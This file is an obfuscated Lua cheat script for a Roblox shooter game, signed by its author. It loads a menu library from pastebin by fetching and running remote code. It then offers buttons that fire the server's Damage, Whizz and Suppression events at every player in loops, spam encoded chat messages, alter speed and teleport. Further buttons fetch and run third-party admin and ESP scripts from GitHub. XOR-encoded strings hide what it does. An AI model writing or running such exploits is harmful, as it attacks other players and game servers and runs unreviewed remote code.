
--[[
 ██▀███  ▓█████▓██   ██▓ ███▄    █ 
▓██ ▒ ██▒▓█   ▀ ▒██  ██▒ ██ ▀█   █ 
▓██ ░▄█ ▒▒███    ▒██ ██░▓██  ▀█ ██▒
▒██▀▀█▄  ▒▓█  ▄  ░ ▐██▓░▓██▒  ▐▌██▒
░██▓ ▒██▒░▒████▒ ░ ██▒▓░▒██░   ▓██░
░ ▒▓ ░▒▓░░░ ▒░ ░  ██▒▒▒ ░ ▒░   ▒ ▒ 
  ░▒ ░ ▒░ ░ ░  ░▓██ ░▒░ ░ ░░   ░ ▒░
  ░░   ░    ░   ▒ ▒ ░░     ░   ░ ░ 
   ░        ░  ░░ ░              ░ 
Its obfuscated  ░ ░ bro :P Reyn#7525
]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v39={};for v47=1, #v8 do v6(v39,v0(v4(v1(v2(v8,v47,v47 + 1 )),v1(v2(v9,1 + ((v47-1)% #v9) ,1 + ((v47-1)% #v9) + 1 )))%256 ));end return v5(v39);end local v10=loadstring(game:HttpGet("https://pastebin.com/raw/V1ca2q9s"))();local v11=v10.Load(v7("\38\151\233\117\43\120\19\226\198\58\14\57\38\174\207\39\5","\97\194\160\85\124\25"));local v12=v11.AddPage(v7("\162\139\232\218","\235\229\142\181\224\32\42\110"));local v13=v11.AddPage(v7("\175\37\85\78","\231\64\57\62\126\42\106"));local v14=v11.AddPage(v7("\192\123\169\31","\141\18\218\124\235\235"));local v15=v11.AddPage(v7("\9\24\250\80\43\19\239\71\56","\74\112\155\34"));local v16=v11.AddPage(v7("\134\153\60\3\187","\201\237\84\102"));local v17=v12.AddLabel(v7("\81\212\89\60\44\67\53\54\236\113\120\62\2\36\111\161\66\121\34\76\101\33\180\34\41","\22\129\16\28\91\34\70"));local v18=v12.AddLabel(v7("\236\128\123\1\30\242\144\57\48\23\233\139\108\59\10\226","\128\233\25\115\127"));local v19=v12.AddLabel(v7("\60\131\252\85\169\231\112\39\136\175\103\160\246\40\61\149\175\9\159\236\112\42\135\235\1\175\235\53\41\146\166","\72\230\143\33\204\131\80"));local v20=v13.AddLabel(v7("\0\67\238\230\125\162\78\62\40\75\186\159\115\185\1\61\33\64\188\159\122\178\2\57\105\81\171\199\102\247\60\44\48\75\237\136\39\229\91\105\32\75\238\219\97","\73\37\206\191\18\215\110\73"));local v21=v14.AddButton(v7("\245\232\251\227\169\255\237\251","\190\129\151\143\137"),function()for v48,v49 in pairs(game:GetService(v7("\112\85\249\97\65\223\192","\32\57\152\24\36\173\179")):GetPlayers()) do for v58=1357 -(895 + 461) ,86 -66  do game:GetService(v7("\72\226\206\40\53\71\205\110\226\218\23\40\75\222\123\224\219","\26\135\190\68\92\36\172"))[v7("\28\166\137\195\24\139\189\245\51\128","\93\229\218\156")].Eventos.Damage:FireServer(v49.Character.Humanoid,8 + 103 ,0 -0 ,2 -1 );end end end);local v22=v14.AddButton(v7("\218\63\162\179\247\119\152\185\236\58","\141\87\203\201"),function()for v50,v51 in pairs(game:GetService(v7("\197\52\39\247\132\242\70","\149\88\70\142\225\128\53\191")):GetPlayers()) do while game:GetService(v7("\49\25\173\197\237\22\36\10\15\166","\99\108\195\150\136\100\82")).RenderStepped:wait(0.001 + 0 ) do game:GetService(v7("\107\35\80\162\80\37\65\186\92\34\115\186\86\52\65\169\92","\57\70\32\206"))[v7("\120\169\104\120\142\87\141\82\73\174","\57\234\59\39\203")].Eventos.Whizz:FireServer(v51);end end end);local v23=v14.AddButton(v7("\204\192\246\204\9\213\110\246\246\218\232\156\58\220\113","\159\181\134\188\123\176\29\133"),function()for v52,v53 in pairs(game:GetService(v7("\211\199\63\204\188\241\216","\131\171\94\181\217")):GetPlayers()) do while game:GetService(v7("\147\211\49\198\124\111\183\207\60\240","\193\166\95\149\25\29")).RenderStepped:wait(0.001 -0 ) do game:GetService(v7("\63\228\6\167\77\14\224\2\174\64\62\245\25\185\69\10\228","\109\129\118\203\36"))[v7("\28\216\8\183\1\84\11\52\245\62","\93\155\91\232\68\58\108")].Eventos.Suppression:FireServer(v53);end end end);local v25=v14.AddToggle(v7("\30\11\226\21\227\85\160\9\6\236\23\176\119\213\20","\93\99\141\122\144\48\128"),false,function(v24)game.Players.LocalPlayer.PlayerGui.TeamChange.Enabled=v24;end);local v26=v14.AddButton(v7("\202\63\70\200\202\240\33\7\230\130\248\59\7\217\202\205\54\87\192\202\203\42\94\203\202\248\33\67\133\189\211\3","\153\79\39\165\234"),function()for v54=3 -2 ,696 -(640 + 49)  do local v55=1471 -(123 + 1348) ;local v56;while true do if (v55==(365 -(347 + 18))) then v56=0 -0 ;while true do if (v56==0) then game:GetService(v7("\27\18\220\65\34\199\212\73\44\19\255\89\36\214\212\90\44","\73\119\172\45\75\164\181\61")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(v7("\157\143\254\72\31\202\56\235\225\154\44\30\168\46\156\253\154\49\112\202\36\255\253\150\56\106\202\11\156\248\149\36\30\165\57\156\251\144\56\30\150\87\251\227\144\58\103\202\35\243\143\158\58\109\190\56\230\143\148\41\30\150\87\251\227\144\58\103\202\35\243\143\239\72\108\174\50\238\143\254\72\31\202\86","\188\175\223\104\62\234\119"),v7("\230\0\0","\167\108\108\145"));wait(1433.05 -(875 + 558) );break;end end break;end end end end);local v27=v14.AddButton(v7("\39\93\208\161\84\68\223\236\55\69\208\184\84\81\145\152\13\93\212\236\49\88\195\163\4\72\208\162\84\122\208\190","\116\45\177\204"),function()for v57=3 -2 ,2 + 5  do game:GetService(v7("\127\5\217\125\230\64\94\89\5\205\66\251\76\77\76\7\204","\45\96\169\17\143\35\63")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(v7("\14\25\134\255\183\191\112\120\119\226\155\182\221\102\15\107\226\134\216\191\108\108\107\238\143\194\191\67\15\124\242\141\217\207\122\110\119\135\136\215\205\31\96\119\135\139\217\207\31\83\25\237\144\223\209\31\123\118\135\138\197\191\67\15\106\232\255\211\197\31\14\25\134\255\183","\47\57\167\223\150\159\63"),v7("\225\9\0","\160\101\108\48"));wait(0.05 + 0 );end end);local v29=v15.AddSlider(v7("\140\133\24\57\251\183\4\55\190\128","\219\228\116\82"),{[v7("\204\241\77","\129\152\35\23")]=8 + 8 ,[v7("\20\193\52","\89\160\76\114\81\57\191")]=224 + 276 ,[v7("\150\254\75","\210\155\45\40\143")]=7 + 9 },function(v28)game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v28;end);local v31=v15.AddSlider(v7("\205\167\77\136\166\4\238\142\122\221\226\52\177\200\44\152\167","\139\232\27\168\142\64"),{[v7("\216\28\91","\149\117\53\194\192\84\233")]=1 + 0 ,[v7("\213\124\161","\152\29\217\65\196\208\75\32")]=1151 -(378 + 653) ,[v7("\26\212\45","\94\177\75\170\207\179\226\88")]=70},function(v30)Workspace.CurrentCamera.FieldOfView=v30;end);local v32=v15.AddButton(v7("\245\140\96","\166\229\20\83\220"),function()game.Players.LocalPlayer.Character.Humanoid.Sit=true;end);local v33=v15.AddButton(v7("\28\11\63\157\48","\88\110\94\233"),function()game.Players.LocalPlayer.Character.Humanoid.Health= -(1959 -(597 + 128));end);local v34=v15.AddButton(v7("\41\129\39\211\63\231","\123\228\109\188\86\137\178"),function()game:GetService(v7("\139\247\250\18\167\116\172\250\140\247\228\1\190\120\187","\223\146\150\119\215\27\222\142")):Teleport(game.PlaceId,game:GetService(v7("\240\176\227\220\197\174\241","\160\220\130\165")).LocalPlayer);end);local v35=v15.AddButton(v7("\51\248\190\222\229\27\19\39\23\250\232\239\149\120\54\58\17\252","\116\145\200\187\197\88\127\78"),function()local v45=0 -0 ;local v46;while true do if (v45==(0 -0)) then v46=0 + 0 ;while true do if (v46==(0 + 0)) then mouse=game.Players.LocalPlayer:GetMouse();tool=Instance.new(v7("\182\58\67\15","\226\85\44\99\218\27"));v46=4 -3 ;end if (v46==(360 -(74 + 284))) then tool.Activated:connect(function()local v62=741 -(8 + 733) ;local v63;local v64;while true do if (v62==(0 + 0)) then local v67=0 + 0 ;while true do if (v67==(503 -(300 + 203))) then v63=0 + 0 ;v64=nil;v67=2 -1 ;end if (v67==(1 + 0)) then v62=1772 -(1014 + 757) ;break;end end end if (v62==(1 + 0)) then while true do if ((3 -2)==v63) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v64;break;end if ((0 + 0)==v63) then local v69=773 -(164 + 609) ;while true do if (v69==(1532 -(1048 + 484))) then v64=mouse.Hit + Vector3.new(74 -(7 + 67) ,1.5 + 1 ,0 + 0 ) ;v64=CFrame.new(v64.X,v64.Y,v64.Z);v69=1 + 0 ;end if (v69==(1259 -(155 + 1103))) then v63=1;break;end end end end break;end end end);tool.Parent=game.Players.LocalPlayer.Backpack;break;end if (v46==(1517 -(925 + 591))) then local v61=0 + 0 ;while true do if ((0 + 0)==v61) then tool.RequiresHandle=false;tool.Name=v7("\100\194\18\7\76\142\47\52","\39\174\123\100");v61=1;end if (v61==(228 -(55 + 172))) then v46=1 + 1 ;break;end end end end break;end end end);local v36=v16.AddButton(v7("\60\5\237\181\27\2\255\185\85\50\226\185\25\15","\117\107\139\220"),function()loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source",true))();end);local v37=v16.AddButton(v7("\93\32\42\245\43","\30\109\110\216\115"),function()loadstring(game:HttpGet("https://raw.githubusercontent.com/CMD-X/CMD-X/master/Source",true))();end);local v38=v16.AddButton(v7("\46\60\131\162\22\55\137\227\62\1\189","\123\82\237\195"),function()loadstring(game:HttpGet("https://raw.githubusercontent.com/ic3w0lf22/Unnamed-ESP/master/UnnamedESP.lua"))();end);print(v7("\145\53\53\171\178\34\103\174\173\55\35\167\166\119\103\149\163\37\103\175\163\50\34\226\160\47\103\144\167\47\41\225\245\99\117\247","\194\86\71\194"));
